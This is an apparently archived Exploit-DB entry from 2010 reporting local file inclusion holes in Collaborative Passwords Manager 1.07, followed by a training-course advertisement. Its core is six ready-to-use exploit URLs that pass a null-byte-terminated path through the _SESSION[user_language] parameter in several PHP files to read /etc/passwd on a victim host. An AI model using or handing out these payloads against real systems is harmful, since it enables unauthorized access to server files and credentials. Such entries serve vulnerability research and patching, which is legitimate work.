Collaborative Passwords Manager 1.07 - Multiple Local File Inclusions

EDB-ID:

15093

CVE:



Author:

sh00t0ut

Type:

webapps


Platform:

PHP

Date:

2010-09-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[~] Collaborative Passwords Manager 1.07 Multiple Local Include Exploit
[~] Found by sh00t0ut
[~] Expl: 
[~] Vendor: http://code.google.com/p/cpassman/downloads/list

http://[victim]/?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00